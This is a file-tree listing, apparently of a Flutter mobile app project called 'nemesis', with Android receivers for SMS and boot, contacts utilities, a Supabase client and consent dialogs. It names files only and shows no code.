# nemesis

./: .gitignore  README.md  pubspec.yaml
android/: build.gradle  gradle.properties  local.properties  settings.gradle
android/app/: build.gradle
android/app/src/debug/: AndroidManifest.xml
android/app/src/main/: AndroidManifest.xml
android/app/src/main/java/io/flutter/plugins/: GeneratedPluginRegistrant.java
android/app/src/main/kotlin/com/example/axium/: BootReceiver.kt  ContactsUtil.kt  MainActivity.kt  SmsReceiver.kt  SupabaseClientManager.kt
android/app/src/main/kotlin/com/example/my_project/: MainActivity.kt
android/app/src/main/kotlin/com/nemesis/axium/: BootReceiver.kt  ContactsUtil.kt  MainActivity.kt  SmsReceiver.kt  SupabaseClientManager.kt
android/app/src/main/res/values/: strings.xml
ios/Runner/: Info.plist
ios/Runner.xcodeproj/: project.pbxproj
lib/: app_state.dart  index.dart  main.dart
lib/backend/supabase/: supabase.dart
lib/custom_code/actions/: call_native_method.dart  get_contacts.dart  index.dart  on_phone_confirm.dart  open_settings.dart  register_receiver.dart  request_permissions.dart  schedule_server_update.dart  store_device_info.dart  store_id.dart
lib/dialogs/collection_denied/: collection_denied_model.dart  collection_denied_widget.dart
lib/dialogs/consent_sms/: consent_sms_model.dart  consent_sms_widget.dart
lib/dialogs/moedas/: moedas_model.dart  moedas_widget.dart
lib/dialogs/permission_denied/: permission_denied_widget.dart
lib/flutter_flow/: custom_functions.dart  flutter_flow_theme.dart  flutter_flow_util.dart  internationalization.dart
lib/flutter_flow/nav/: nav.dart  serialization_util.dart
lib/pages/home2/: home2_model.dart  home2_widget.dart
lib/pages/home3/: home3_model.dart  home3_widget.dart
lib/pages/home_page/: home_page_widget.dart
test/: widget_test.dart
web/: index.html
(+19 files in other folders)
